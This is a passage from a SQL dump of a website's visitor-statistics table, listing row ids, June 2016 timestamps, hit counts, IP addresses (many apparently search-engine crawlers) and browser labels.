''),(44290,1465945025,1,1,0,0,'141.8.142.58','other'),(44291,1465945698,1,0,1,0,'66.249.69.180',''),(44292,1465947542,1,1,0,0,'180.76.15.18','other'),(44293,1465948671,1,0,1,0,'66.249.75.199',''),(44294,1465948828,1,0,1,0,'66.249.75.191',''),(44295,1465951312,1,1,0,0,'66.249.69.175','chrome'),(44296,1465951638,1,0,1,0,'66.249.69.239',''),(44297,1465957111,1,1,0,0,'93.158.152.84','other'),(44298,1465957237,1,1,0,0,'130.193.51.19','other'),(44299,1465957363,1,1,0,0,'141.8.142.67','other'),(44300,1465959797,1,0,1,0,'66.249.69.175',''),(44301,1465961028,1,0,1,0,'66.249.69.170',''),(44302,1465962213,1,1,0,0,'141.8.142.61','other'),(44303,1465962583,1,1,0,0,'66.249.69.175','chrome'),(44304,1465962631,1,0,1,0,'66.249.69.170',''),(44305,1465966051,1,0,1,0,'66.249.69.180',''),(44306,1465968657,1,1,0,0,'94.179.13.143','firefox'),(44307,1465968785,1,1,0,0,'95.133.79.140','chrome'),(44308,1465969161,3,0,3,0,'66.249.75.207',''),(44309,1465969191,1,0,1,0,'66.249.75.199',''),(44310,1465969575,1,1,0,0,'194.44.201.147','chrome'),(44311,1465970581,1,1,0,0,'91.196.178.66','firefox'),(44312,1465971152,1,1,0,0,'130.193.50.34','other'),(44313,1465971198,2,2,0,0,'46.173.161.34','chrome'),(44314,1465971604,1,1,0,0,'141.8.183.25','other'),(44315,1465971652,1,1,0,0,'66.249.93.153','chrome'),(44316,1465972346,3,3,0,0,'69.30.234.186','other'),(44317,1465973171,1,0,1,0,'66.249.69.249',''),(44318,1465973422,1,1,0,0,'46.200.102.20','chrome'),(44319,1465974920,1,1,0,0,'141.8.183.25','other'),(44320,1465975005,1,0,1,0,'66.249.75.207',''),(44321,1465975601,1,1,0,0,'94.179.116.250','chrome'),(44322,1465975605,1,1,0,0,'91.196.178.97','firefox'),(44323,1465975953,1,1,0,0,'37.53.192.49','opera'),(44324,1465976072,1,1,0,0,'91.196.178.66','firefox'),(44325,1465976575,1,1,0,0,'46.165.197.142','other'),(44326,1465977153,1,1,0,0,'91.196.178.66','firefox'),(44327,1465978874,1,1,0,0,'94.231.188.58','firefox'),(44328,1465979513,1,1,0,0,'178.92.48.58','firefox'),(44329,1465980051,1,1,0,0,'212.66.53.51','chrome'),(44330,1465980686,1,1,0,0,'91.196.178.66','firefox'),(44331,1465980965,1,0,1,0,'66.249.69.244',''),(44332,1465981008,1,1,0,0,'46.211.114.249','other'),(44333,1465981884,1,1,0,0,'141.8.142.67','other'),(44334,1465981969,1,1,0,0,'82.207.91.234','firefox'),(44335,1465983021,1,1,0,0,'141.8.142.58','other'),(44336,1465983083,1,1,0,0,'141.8.183.19','other'),(44337,1465983633,1,1,0,0,'62.122.206.148','chrome'),(44338,1465983677,1,1,0,0,'37.53.192.49','opera'),(44339,1465984481,1,0,1,0,'66.249.69.170',''),(44340,1465984585,1,0,1,0,'66.249.69.244',''),(44341,1465984860,1,1,0,0,'95.135.241.39','chrome'),(44342,1465984875,1,1,0,0,'141.8.183.25','other'),(44343,1465985867,1,1,0,0,'40.77.167.57','other'),(44344,1465985897,1,1,0,0,'130.193.50.34','other'),(44345,1465986901,1,0,1,0,'66.249.69.170',''),(44346,1465987321,1,1,0,0,'130.193.51.19','other'),(44347,1465987740,1,1,0,0,'91.196.178.165','firefox'),(44348,1465987814,1,0,1,0,'66.249.69.244',''),(44349,1465988736,1,1,0,0,'83.218.235.148','other'),(44350,1465989155,1,1,0,0,'91.196.178.66','firefox'),(44351,1465989380,1,1,0,0,'93.171.172.136','chrome'),(44352,1465989567,1,1,0,0,'130.193.51.19','other'),(44353,1465990229,1,0,1,0,'66.249.69.170',''),(44354,1465990262,1,1,0,0,'141.8.183.25','other'),(44355,1465990947,1,1,0,0,'37.53.229.232','firefox'),(44356,1465991344,1,1,0,0,'51.255.65.32','other'),(44357,1465991378,1,1,0,0,'77.109.22.140','chrome'),(44358,1465992023,1,1,0,0,'94.45.70.45','chrome'),(44359,1465994393,1,0,1,0,'66.249.75.247',''),(44360,1465994809,1,0,1,0,'66.249.75.199',''),(44361,1465995377,1,1,0,0,'141.8.142.58','other'),(44362,1465995643,1,1,0,0,'130.193.51.19','other'),(44363,1465996472,1,1,0,0,'141.8.183.25','other'),(44364,1465997091,1,1,0,0,'82.207.119.65','msie'),(44365,1465997266,1,1,0,0,'82.145.221.24','opera'),(44366,1465997318,1,1,0,0,'46.175.79.167','chrome'),(44367,1465997333,1,1,0,0,'95.134.228.22','chrome'),(44368,1465997426,1,0,1,0,'66.249.75.239',''),(44369,1465997521,1,1,0,0,'91.196.179.33','firefox'),(44370,1465997759,1,1,0,0,'95.134.243.178','chrome'),(44371,1465997846,1,1,0,0,'91.222.155.137','chrome'),(44372,1465998356,1,1,0,0,'66.249.75.191','chrome'),(44373,1465999096,1,0,1,0,'66.249.66.185',''),(44374,1465999354,1,1,0,0,'178.95.158.137','chrome'),(44375,1466000334,2,2,0,0,'130.193.50.34','other'),(44376,1466000872,1,1,0,0,'141.8.183.25','other'),(44377,1466001003,1,1,0,0,'141.8.142.61','other'),(44378,1466001257,1,1,0,0,'130.193.51.19','other'),(44379,1466001464,2,0,2,0,'66.249.66.180',''),(44380,1466002013,1,0,1,0,'66.249.66.182',''),(44381,1466002838,1,0,1,0,'66.249.66.183',''),(44382,1466003300,1,1,0,0,'94.158.95.184','chrome'),(44383,1466004018,1,1,0,0,'93.158.152.84','other'),(44384,1466004162,1,1,0,0,'130.193.50.34','other'),(44385,1466004245,1,1,0,0,'91.196.178.167','other'),(44386,1466004299,1,1,0,0,'92.113.175.107','firefox'),(44387,1466005867,1,1,0,0,'91.196.178.165','chrome'),(44388,1466006706,1,1,0,0,'91.196.178.65','firefox'),(44389,1466007523,1,0,1,0,'66.249.75.247',''),(44390,1466008076,1,0,1,0,'66.249.66.147',''),(44391,1466008259,2,2,0,0,'141.8.183.25','other'),(44392,1466008538,1,0,1,0,'66.249.66.174',''),(44393,1466008571,1,1,0,0,'130.193.50.34','other'),(44394,1466009158,1,0,1,0,'66.249.66.188',''),(44395,1466010891,1,1,0,0,'130.193.50.34','other'),(44396,1466014383,1,0,1,0,'66.249.66.82',''),(44397,1466014563,1,0,1,0,'66.249.66.81',''),(44398,1466014959,1,1,0,0,'193.194.127.217','firefox'),(44399,1466016130,1,1,0,0,'40.77.167.10','other'),(44400,1466016734,1,1,0,0,'91.196.178.72','chrome'),(44401,1466016983,1,1,0,0,'141.8.142.58','other'),(44402,1466017673,1,1,0,0,'141.8.183.25','other'),(44403,1466017679,1,1,0,0,'130.193.50.34','other'),(44404,1466017800,1,1,0,0,'130.193.51.19','other'),(44405,1466018217,1,0,1,0,'66.249.66.180',''),(44406,1466019117,1,1,0,0,'193.106.145.115','chrome'),(44407,1466021448,2,2,0,0,'178.216.229.56','chrome'),(44408,1466021584,1,1,0,0,'141.8.142.58','other'),(44409,1466022455,1,0,1,0,'66.249.66.180',''),(44410,1466024044,1,1,0,0,'37.55.145.218','chrome'),(44411,1466024936,1,1,0,0,'130.193.50.34','other'),(44412,1466025970,1,1,0,0,'157.55.39.222','other'),(44413,1466027663,1,0,1,0,'66.249.66.177',''),(44414,1466027674,1,0,1,0,'66.249.66.185',''),(44415,1466029318,1,1,0,0,'130.193.50.34','other'),(44416,1466029455,1,1,0,0,'141.8.142.61','other'),(44417,1466029581,1,1,0,0,'130.193.51.19','other'),(44418,1466032295,1,1,0,0,'141.8.142.61','other'),(44419,1466032353,1,1,0,0,'130.193.50.34','other'),(44420,1466032439,1,0,1,0,'66.249.66.177',''),(44421,1466037532,1,0,1,0,'66.249.66.185',''),(44422,1466038109,1,1,0,0,'130.193.51.19','other'),(44423,1466038124,1,0,1,0,'66.249.75.191',''),(44424,1466039175,1,1,0,0,'66.249.66.185','chrome'),(44425,1466040223,1,1,0,0,'141.8.142.61','other'),(44426,1466041154,1,0,1,0,'66.249.66.183',''),(44427,1466041531,1,0,1,0,'66.249.66.180',''),(44428,1466044761,1,1,0,0,'66.249.66.182','chrome'),(44429,1466045831,1,0,1,0,'66.249.66.177',''),(44430,1466050239,1,0,1,0,'66.249.66.177',''),(44431,1466052998,1,1,0,0,'93.180.64.135','other'),(44432,1466053617,1,1,0,0,'91.196.178.66','chrome'),(44433,1466054012,1,1,0,0,'141.8.142.61','other'),(44434,1466054179,1,1,0,0,'130.193.50.34','other'),(44435,1466054679,1,1,0,0,'94.179.123.233','firefox'),(44436,1466055427,1,1,0,0,'91.196.178.66','firefox'),(44437,1466055928,1,0,1,0,'66.249.66.188',''),(44438,1466056200,1,1,0,0,'178.92.211.135','chrome'),(44439,1466056314,1,1,0,0,'40.77.167.10','other'),(44440,1466056742,2,2,0,0,'91.196.178.66','firefox'),(44441,1466056759,1,1,0,0,'104.209.188.207','other'),(44442,1466056768,2,2,0,0,'91.196.178.70','chrome'),(44443,1466056807,1,1,0,0,'91.196.178.70','firefox'),(44444,1466056897,1,0,1,0,'66.249.66.188',''),(44445,1466057624,1,1,0,0,'46.211.155.83','firefox'),(44446,1466057910,2,2,0,0,'141.8.142.58','other'),(44447,1466057920,1,1,0,0,'91.196.178.66','firefox'),(44448,1466058216,1,1,0,0,'91.192.135.241','firefox'),(44449,1466058915,1,1,0,0,'193.200.212.50','firefox'),(44450,1466059330,1,0,1,0,'66.249.66.177',''),(44451,1466061081,1,1,0,0,'46.4.32.75','other'),(44452,1466062912,2,0,2,0,'66.249.66.177',''),(44453,1466063175,1,0,1,0,'66.249.69.244',''),(44454,1466064548,1,1,0,0,'91.196.178.66','firefox'),(44455,1466065464,27,27,0,0,'92.222.94.117','other'),(44456,1466065611,1,1,0,0,'91.196.178.65','firefox'),(44457,1466065804,1,1,0,0,'151.80.31.179','other'),(44458,1466065823,1,1,0,0,'66.249.93.153','chrome'),(44459,1466066034,1,1,0,0,'91.196.178.66','firefox'),(44460,1466066151,1,1,0,0,'66.249.66.183','chrome'),(44461,1466066694,1,0,1,0,'66.249.66.185',''),(44462,1466067644,1,0,1,0,'66.249.66.182',''),(44463,1466068036,1,1,0,0,'77.120.169.47','chrome'),(44464,1466069493,22,22,0,0,'51.254.141.216','other'),(44465,1466069550,1,1,0,0,'141.8.142.58','other'),(44466,1466069851,1,1,0,0,'94.179.80.92','firefox'),(44467,1466069872,1,1,0,0,'130.193.51.19','other'),(44468,1466070900,1,1,0,0,'95.135.89.239','chrome'),(44469,1466071103,1,0,1,0,'66.249.66.177',''),(44470,1466071246,1,0,1,0,'66.249.66.182',''),(44471,1466072317,1,1,0,0,'91.196.178.35','firefox'),(44472,1466072488,1,1,0,0,'164.132.161.28','other'),(44473,1466072747,1,1,0,0,'164.132.161.38','other'),(44474,1466072962,2,2,0,0,'178.95.247.32','chrome'),(44475,1466074219,1,0,1,0,'66.249.66.182',''),(44476,1466074952,1,1,0,0,'157.55.39.94','other'),(44477,1466075701,1,1,0,0,'91.196.178.72','firefox'),(44478,1466077291,1,1,0,0,'195.162.90.62','chrome'),(44479,1466077320,1,0,1,0,'66.249.66.188',''),(44480,1466077331,1,0,1,0,'66.249.66.183',''),(44481,1466077342,1,0,1,0,'66.249.66.180',''),(44482,1466077504,1,1,0,0,'193.200.212.50','firefox'),(44483,1466077568,1,1,0,0,'193.110.17.234','firefox'),(44484,1466077881,1,1,0,0,'66.249.66.183','chrome'),(44485,1466078257,1,0,1,0,'66.249.66.185',''),(44486,1466078955,1,1,0,0,'141.8.142.67','other'),(44487,1466079421,1,1,0,0,'91.196.178.70','firefox'),(44488,1466080832,1,1,0,0,'141.8.142.67','other'),(44489,1466082331,1,1,0,0,'37.52.19.67','firefox'),(44490,1466082486,2,2,0,0,'141.8.183.25','other'),(44491,1466082913,1,1,0,0,'91.196.178.100','chrome'),(44492,1466083276,1,1,0,0,'91.124.175.128','chrome'),(44493,1466084146,2,0,2,0,'66.249.66.185',''),(44494,1466084364,1,1,0,0,'91.124.175.128','chrome'),(44495,1466084744,1,1,0,0,'193.110.17.234','firefox'),(44496,1466085360,1,0,1,0,'66.249.66.183',''),(44497,1466085421,1,0,1,0,'66.249.66.188',''),(44498,1466087658,1,1,0,0,'178.92.7.106','chrome'),(44499,1466088541,1,0,1,0,'66.249.66.182',''),(44500,1466089053,1,1,0,0,'66.249.66.188','chrome'),(44501,1466096206,1,1,0,0,'66.249.66.177','chrome'),(44502,1466096662,1,0,1,0,'66.249.66.182',''),(44503,1466097185,4,4,0,0,'51.254.143.241','other'),(44504,1466097232,1,0,1,0,'66.249.66.180',''),(44505,1466097384,1,1,0,0,'130.193.50.34','other'),(44506,1466097734,1,1,0,0,'180.76.15.27','other'),(44507,1466099355,1,0,1,0,'66.249.66.188',''),(44508,1466099458,1,1,0,0,'130.193.50.34','other'),(44509,1466099743,1,1,0,0,'180.76.15.140','other'),(44510,1466101061,1,1,0,0,'193.194.127.217','firefox'),(44511,1466101294,1,1,0,0,'91.196.178.67','firefox'),(44512,1466102258,1,1,0,0,'91.124.173.153','firefox'),(44513,1466104137,1,0,1,0,'66.249.66.182',''),(44514,1466104790,1,1,0,0,'91.196.178.133','chrome'),(44515,1466105601,1,1,0,0,'157.55.39.151','other'),(44516,1466106511,2,2,0,0,'94.179.51.181','chrome'),(44517,1466107001,1,1,0,0,'51.255.65.46','other'),(44518,1466107074,1,1,0,0,'176.8.9.17','chrome'),(44519,1466107474,1,0,1,0,'66.249.75.231',''),(44520,1466107745,1,0,1,0,'66.249.66.182',''),(44521,1466109193,1,1,0,0,'91.196.178.72','chrome'),(44522,1466109556,1,1,0,0,'141.8.183.25','other'),(44523,1466109790,1,1,0,0,'141.8.142.58','other'),(44524,1466110456,1,0,1,0,'66.249.75.247',''),(44525,1466111805,1,1,0,0,'64.74.215.1','chrome'),(44526,1466112305,1,1,0,0,'130.193.50.34','other'),(44527,1466112861,1,1,0,0,'51.255.65.17','other'),(44528,1466113427,1,1,0,0,'130.193.50.34','other'),(44529,1466114297,1,0,1,0,'66.249.66.183',''),(44530,1466115266,1,1,0,0,'141.8.142.58','other'),(44531,1466115446,1,1,0,0,'130.193.50.34','other'),(44532,1466116135,1,0,1,0,'66.249.66.177',''),(44533,1466116582,1,1,0,0,'66.249.66.177','chrome'),(44534,1466116683,1,1,0,0,'157.55.39.151','other'),(44535,1466118576,1,1,0,0,'141.8.183.25','other'),(44536,1466118973,1,0,1,0,'66.249.66.188',''),(44537,1466120012,1,1,0,0,'141.8.142.67','other'),(44538,1466120140,6,6,0,0,'141.8.183.25','other'),(44539,1466120335,1,1,0,0,'130.193.51.19','other'),(44540,1466121992,1,1,0,0,'130.193.51.19','other'),(44541,1466124226,1,1,0,0,'141.8.183.25','other'),(44542,1466125697,2,2,0,0,'157.55.39.160','other'),(44543,1466129446,1,0,1,0,'66.249.66.182',''),(44544,1466130414,2,0,2,0,'66.249.66.180',''),(44545,1466130513,1,0,1,0,'66.249.66.177',''),(44546,1466131736,1,0,1,0,'66.249.66.185',''),(44547,1466135826,1,1,0,0,'95.28.79.10','firefox'),(44549,1466135827,1,1,0,0,'176.77.103.84','msie'),(44550,1466135828,1,1,0,0,'188.32.71.228','opera'),(44551,1466135829,1,1,0,0,'37.110.48.22','msie'),(44552,1466135979,1,1,0,0,'180.76.15.11','other'),(44553,1466135981,1,1,0,0,'180.76.15.159','other'),(44554,1466137111,1,1,0,0,'141.8.183.25','other'),(44555,1466137503,1,1,0,0,'64.74.215.1','chrome'),(44556,1466140403,1,0,1,0,'66.249.66.182',''),(44557,1466140445,1,1,0,0,'141.8.183.25','other'),(44558,1466140567,1,0,1,0,'66.249.66.177',''),(44559,1466140844,1,1,0,0,'66.102.9.113','chrome'),(44560,1466142223,1,1,0,0,'194.44.130.126','chrome'),(44561,1466142325,1,1,0,0,'91.196.178.72','chrome'),(44562,1466143063,1,1,0,0,'91.196.178.70','firefox'),(44563,1466143181,1,1,0,0,'66.249.66.180','chrome'),(44564,1466144334,1,1,0,0,'130.193.50.34','other'),(44565,1466145026,1,1,0,0,'46.201.8.64','chrome'),(44566,1466145292,1,1,0,0,'66.249.66.183','chrome'),(44567,1466145904,1,1,0,0,'109.86.16.57','chrome'),(44568,1466146770,1,1,0,0,'195.78.101.66','chrome'),(44569,1466147317,1,0,1,0,'66.249.66.177',''),(44570,1466147902,1,1,0,0,'91.196.178.169','chrome'),(44571,1466149191,2,2,0,0,'91.196.178.169','chrome'),(44572,1466149324,1,0,1,0,'66.249.66.177',''),(44573,1466149673,1,1,0,0,'94.179.95.220','firefox'),(44574,1466149872,1,1,0,0,'178.92.7.106','chrome'),(44575,1466150914,1,0,1,0,'66.249.66.182',''),(44576,1466152034,1,1,0,0,'188.191.21.69','chrome'),(44577,1466152506,1,1,0,0,'92.112.24.125','chrome'),(44578,1466153144,1,0,1,0,'66.249.66.177',''),(44579,1466153714,1,0,1,0,'66.249.66.182',''),(44580,1466154890,1,1,0,0,'180.76.15.137','other'),(44581,1466155493,1,1,0,0,'91.196.178.70','firefox'),(44582,1466156908,1,1,0,0,'130.193.51.19','other'),(44583,1466156990,1,1,0,0,'95.134.117.45','chrome'),(44584,1466156998,1,0,1,0,'66.249.69.239',''),(44585,1466158779,1,1,0,0,'141.8.142.61','other'),(44586,1466159305,2,2,0,0,'46.219.252.217','chrome'),(44587,1466160359,1,0,1,0,'66.249.66.180',''),(44588,1466160414,1,0,1,0,'66.249.66.188',''),(44589,1466160743,1,1,0,0,'178.92.45.163','chrome'),(44590,1466161827,1,1,0,0,'178.92.45.163','chrome'),(44591,1466162198,1,0,1,0,'66.249.66.185',''),(44592,1466162260,1,1,0,0,'174.129.237.157','other'),(44593,1466162634,1,1,0,0,'94.179.20.166','firefox'),(44594,1466163094,1,1,0,0,'91.196.178.133','firefox'),(44595,1466163666,1,1,0,0,'91.196.178.70','firefox'),(44596,1466163738,1,1,0,0,'130.193.51.19','other'),(44597,1466164114,1,1,0,0,'91.204.213.42','chrome'),(44598,1466164211,1,1,0,0,'193.200.212.50','firefox'),(44599,1466165240,1,1,0,0,'194.44.130.126','firefox'),(44600,1466165259,1,1,0,0,'141.8.142.58','other'),(44601,1466165906,1,1,0,0,'95.135.51.72','chrome'),(44602,1466166325,1,1,0,0,'130.193.50.34','other'),(44603,1466166661,2,2,0,0,'78.154.176.4','chrome'),(44604,1466166689,1,1,0,0,'141.8.142.58','other'),(44605,1466168338,1,1,0,0,'95.133.99.205','msie'),(44606,1466169085,1,1,0,0,'54.244.48.59','msie'),(44607,1466171139,1,1,0,0,'66.249.93.147','chrome'),(44608,1466171383,1,1,0,0,'94.179.250.15','chrome'),(44609,1466172402,1,0,1,0,'66.249.66.182',''),(44610,1466172538,1,0,1,0,'66.249.66.185',''),(44611,1466172875,1,1,0,0,'37.54.115.126','firefox'),(44612,1466173931,1,0,1,0,'66.249.66.177',''),(44613,1466174941,1,1,0,0,'51.255.65.74','other'),(44614,1466175125,1,0,1,0,'66.249.66.182',''),(44615,1466176299,1,0,1,0,'66.249.66.182',''),(44616,1466176357,1,1,0,0,'141.8.183.25','other'),(44617,1466177599,2,2,0,0,'5.9.151.22','other'),(44618,1466180080,1,1,0,0,'66.249.78.136','chrome'),(44619,1466180767,1,1,0,0,'66.249.78.150','chrome'),(44620,1466181369,1,1,0,0,'66.249.78.164','chrome'),(44621,1466182579,1,0,1,0,'66.249.78.164',''),(44622,1466183366,1,1,0,0,'66.249.75.191','chrome'),(44623,1466185745,9,9,0,0,'158.69.214.109','other'),(44624,1466185828,299,299,0,0,'178.63.86.11','other'),(44625,1466186877,1,1,0,0,'193.194.127.217','firefox'),(44626,1466186924,1,1,0,0,'130.193.50.34','other'),(44627,1466187053,1,1,0,0,'91.196.178.71','firefox'),(44628,1466187191,1,1,0,0,'178.93.148.96','chrome'),(44629,1466187302,1,0,1,0,'66.249.78.143',''),(44630,1466188382,1,0,1,0,'66.249.78.164',''),(44631,1466189092,1,1,0,0,'37.54.115.126','firefox'),(44632,1466189276,1,1,0,0,'157.55.39.189','other'),(44633,1466189649,1,1,0,0,'141.8.142.58','other'),(44634,1466191697,1,1,0,0,'130.193.51.19','other'),(44635,1466191968,1,1,0,0,'37.54.115.126','firefox'),(44636,1466193225,1,1,0,0,'141.8.142.58','other'),(44637,1466194289,1,1,0,0,'130.193.51.19','other'),(44638,1466195961,1,1,0,0,'157.55.39.218','other'),(44639,1466196664,2,2,0,0,'130.193.51.19','other'),(44640,1466198020,1,0,1,0,'66.249.78.136',''),(44641,1466198575,1,1,0,0,'141.8.183.25','other'),(44642,1466198943,1,0,1,0,'66.249.78.164',''),(44643,1466200002,1,1,0,0,'130.193.50.34','other'),(44644,1466201671,2,2,0,0,'141.8.183.25','other'),(44645,1466202177,1,0,1,0,'66.249.78.143',''),(44646,1466205443,1,1,0,0,'91.196.178.39','chrome'),(44647,1466205680,1,0,1,0,'66.249.78.143',''),(44648,1466205690,1,1,0,0,'51.255.207.27','other'),(44649,1466206487,2,2,0,0,'209.58.178.145','other'),(44650,1466206529,1,1,0,0,'78.111.189.170','chrome'),(44651,1466206967,1,0,1,0,'66.249.78.171',''),(44652,1466208371,1,1,0,0,'141.8.183.25','other'),(44653,1466212689,1,1,0,0,'141.8.142.58','other'),(44654,1466212822,1,1,0,0,'141.8.142.61','other'),(44655,1466214049,1,1,0,0,'66.249.78.178','chrome'),(44656,1466215074,270,270,0,0,'94.208.145.95','other'),(44657,1466215682,1,1,0,0,'51.255.65.41','other'),(44658,1466216477,1,0,1,0,'66.249.78.143',''),(44659,1466217319,1,1,0,0,'46.242.78.131','chrome'),(44660,1466217321,1,1,0,0,'37.204.136.38','chrome'),(44661,1466217335,1,1,0,0,'66.249.78.136','chrome'),(44662,1466219075,1,0,1,0,'66.249.78.150',''),(44663,1466219417,1,0,1,0,'66.249.78.164',''),(44664,1466223772,1,1,0,0,'141.8.142.58','other'),(44665,1466224037,4,4,0,0,'5.9.63.149','other'),(44666,1466224833,1,0,1,0,'66.249.75.207',''),(44667,1466225377,1,0,1,0,'66.249.66.185',''),(44668,1466225503,1,0,1,0,'66.249.78.150',''),(44669,1466228420,1,1,0,0,'130.193.50.34','other'),(44670,1466228862,1,1,0,0,'66.102.9.103','chrome'),(44671,1466230485,1,1,0,0,'141.8.183.25','other'),(44672,1466230625,1,0,1,0,'66.249.78.150',''),(44673,1466231403,3,3,0,0,'130.193.50.34','other'),(44674,1466231546,1,1,0,0,'130.193.51.19','other'),(44675,1466231762,2,2,0,0,'141.8.183.25','other'),(44676,1466232164,1,0,1,0,'66.249.78.164',''),(44677,1466232698,1,0,1,0,'66.249.66.180',''),(44678,1466232751,2,0,2,0,'66.249.78.136',''),(44679,1466235040,1,1,0,0,'141.8.183.25','other'),(44680,1466235527,1,1,0,0,'130.193.50.34','other'),(44681,1466235737,1,1,0,0,'141.8.142.58','other'),(44682,1466236852,1,0,1,0,'66.249.69.244',''),(44683,1466236978,1,1,0,0,'37.54.143.98','chrome'),(44684,1466237155,1,1,0,0,'37.54.115.126','firefox'),(44685,1466238167,1,1,0,0,'141.8.183.25','other'),(44686,1466238182,1,0,1,0,'66.249.69.180',''),(44687,1466238428,1,0,1,0,'66.249.69.170',''),(44688,1466239732,1,1,0,0,'93.171.241.66','firefox'),(44689,1466240682,1,1,0,0,'37.55.56.162','firefox'),(44690,1466241675,1,1,0,0,'37.55.56.162','firefox'),(44691,1466241760,1,1,0,0,'141.8.183.25','other'),(44692,1466242281,1,0,1,0,'66.249.78.150',''),(44693,1466243034,1,1,0,0,'141.8.183.25','other'),(44694,1466244386,1,1,0,0,'194.242.103.188','chrome'),(44695,1466247279,1,1,0,0,'37.54.115.126','firefox'),(44696,1466248103,1,0,1,0,'66.249.78.171',''),(44697,1466249326,1,1,0,0,'157.55.39.189','other'),(44698,1466251375,1,1,0,0,'178.154.189.202','other'),(44699,1466252264,1,0,1,0,'66.249.78.150',''),(44700,1466255008,1,1,0,0,'51.255.65.52','other'),(44701,1466256001,1,1,0,0,'69.30.205.218','other'),(44702,1466256586,1,1,0,0,'180.76.15.154','other'),(44703,1466256858,1,1,0,0,'91.196.178.166','other'),(44704,1466256965,1,1,0,0,'91.196.178.35','firefox'),(44705,1466258838,3,3,0,0,'88.247.40.30','other'),(44706,1466259162,1,0,1,0,'66.249.78.171',''),(44707,1466260339,1,1,0,0,'66.249.78.136','chrome'),(44708,1466262642,1,1,0,0,'66.249.78.143','chrome'),(44709,1466263108,2,2,0,0,'93.183.204.29','chrome'),(44710,1466263823,1,0,1,0,'66.249.78.136',''),(44711,1466269750,1,0,1,0,'66.249.75.247',''),(44712,1466271548,1,0,1,0,'66.249.78.164',''),(44713,1466272303,1,1,0,0,'164.132.161.67','other'),(44714,1466272420,1,1,0,0,'91.196.178.34','chrome'),(44715,1466274072,1,0,1,0,'66.249.78.150',''),(44716,1466281224,1,0,1,0,'66.249.78.143',''),(44717,1466286231,1,0,1,0,'66.249.66.180',''),(44718,1466288303,1,0,1,0,'66.249.78.136',''),(44719,1466288325,1,1,0,0,'66.249.78.171','chrome'),(44720,1466294922,1,0,1,0,'66.249.75.239',''),(44721,1466296524,1,1,0,0,'141.8.142.58','other'),(44722,1466296915,1,1,0,0,'164.132.161.56','other'),(44723,1466297134,1,0,1,0,'66.249.78.150',''),(44724,1466299921,1,0,1,0,'66.249.78.164',''),(44725,1466302466,1,1,0,0,'130.193.51.79','other'),(44726,1466303504,1,1,0,0,'5.9.63.149','other'),(44727,1466304865,1,0,1,0,'66.249.75.191',''),(44728,1466305761,1,0,1,0,'66.249.78.150',''),(44729,1466311043,1,1,0,0,'164.132.161.91','other'),(44730,1466316329,1,1,0,0,'207.46.13.172','other'),(44731,1466316420,1,1,0,0,'178.92.95.120','chrome'),(44732,1466316534,1,0,1,0,'66.249.78.178',''),(44733,1466316711,1,1,0,0,'141.8.142.61','other'),(44734,1466316759,1,1,0,0,'180.76.15.158','other'),(44735,1466318408,1,0,1,0,'66.249.78.171',''),(44736,1466320005,1,1,0,0,'91.121.181.101','other'),(44737,1466320608,1,0,1,0,'66.249.78.150',''),(44738,1466321875,1,0,1,0,'66.249.66.177',''),(44739,1466323322,1,1,0,0,'66.249.93.153','chrome'),(44740,1466323970,1,1,0,0,'130.193.50.34','other'),(44741,1466325234,1,1,0,0,'157.55.39.218','other'),(44742,1466327156,1,1,0,0,'37.54.143.98','chrome'),(44743,1466327218,1,1,0,0,'141.8.142.58','other'),(44744,1466328014,2,2,0,0,'141.8.183.25','other'),(44745,1466331129,1,0,1,0,'66.249.78.143',''),(44746,1466331382,1,1,0,0,'141.8.142.67','other'),(44747,1466331939,1,0,1,0,'66.249.78.171',''),(44748,1466336142,1,1,0,0,'66.249.78.150','chrome'),(44749,1466336522,1,1,0,0,'51.255.65.71','other'),(44750,1466337896,1,1,0,0,'91.196.178.35','firefox'),(44751,1466339544,1,1,0,0,'66.249.78.178','chrome'),(44752,1466339887,1,0,1,0,'66.249.66.180',''),(44753,1466342149,1,0,1,0,'66.249.78.171',''),(44754,1466343060,1,1,0,0,'141.8.183.25','other'),(44755,1466344428,158,158,0,0,'174.34.135.242','other'),(44756,1466345336,142,142,0,0,'174.34.135.242','other'),(44757,1466345756,1,1,0,0,'157.55.39.94','other'),(44758,1466346577,12,12,0,0,'51.254.143.239','other'),(44759,1466347743,1,0,1,0,'66.249.66.182',''),(44760,1466347913,1,1,0,0,'94.179.66.7','chrome'),(44761,1466348166,1,0,1,0,'66.249.78.178',''),(44762,1466348514,1,1,0,0,'51.255.65.7','other'),(44763,1466349012,1,1,0,0,'173.234.159.250','other'),(44764,1466349282,1,0,1,0,'66.249.78.178',''),(44765,1466349442,1,1,0,0,'40.77.167.78','other'),(44766,1466349505,1,1,0,0,'93.158.152.51','other'),(44767,1466351528,1,1,0,0,'51.255.65.77','other'),(44768,1466353677,1,1,0,0,'180.76.15.145','other'),(44769,1466356575,1,0,1,0,'66.249.78.178',''),(44770,1466358044,2,2,0,0,'141.8.142.58','other'),(44771,1466358746,1,1,0,0,'130.193.50.34','other'),(44772,1466358878,1,1,0,0,'141.8.142.67','other'),(44773,1466359340,4,4,0,0,'162.210.196.98','other'),(44774,1466362285,4,4,0,0,'37.54.115.126','firefox'),(44775,1466362546,1,1,0,0,'82.145.217.148','other'),(44776,1466363333,1,0,1,0,'66.249.78.143',''),(44777,1466363771,1,1,0,0,'66.249.78.178','chrome'),(44778,1466363774,1,1,0,0,'141.8.142.58','other'),(44779,1466366751,1,1,0,0,'82.145.210.73','other'),(44780,1466367030,1,1,0,0,'31.43.148.20','other'),(44781,1466367711,1,0,1,0,'68.180.231.49',''),(44782,1466367736,1,1,0,0,'130.193.50.34','other'),(44783,1466370284,1,1,0,0,'82.145.220.13','other'),(44784,1466371006,2,2,0,0,'141.8.142.58','other'),(44785,1466371226,1,1,0,0,'130.193.51.19','other'),(44786,1466374277,1,1,0,0,'141.8.142.58','other'),(44787,1466381044,1,1,0,0,'141.8.142.61','other'),(44788,1466382405,1,1,0,0,'93.158.152.84','other'),(44789,1466382604,1,1,0,0,'141.8.142.67','other'),(44790,1466383294,1,1,0,0,'141.8.142.58','other'),(44791,1466383338,1,1,0,0,'51.255.65.43','other'),(44792,1466385478,14,0,14,0,'68.180.231.49',''),(44793,1466385964,1,0,1,0,'66.249.78.150',''),(44794,1466386411,2,0,2,0,'68.180.231.49',''),(44795,1466387315,1,0,1,0,'68.180.231.49',''),(44796,1466388839,1,1,0,0,'82.145.219.91','other'),(44797,1466388989,1,0,1,0,'66.249.78.150',''),(44798,1466390542,1,1,0,0,'141.8.183.25','other'),(44799,1466391043,1,0,1,0,'66.249.78.164',''),(44800,1466391732,1,0,1,0,'66.249.78.171',''),(44801,1466396199,1,0,1,0,'66.249.78.143',''),(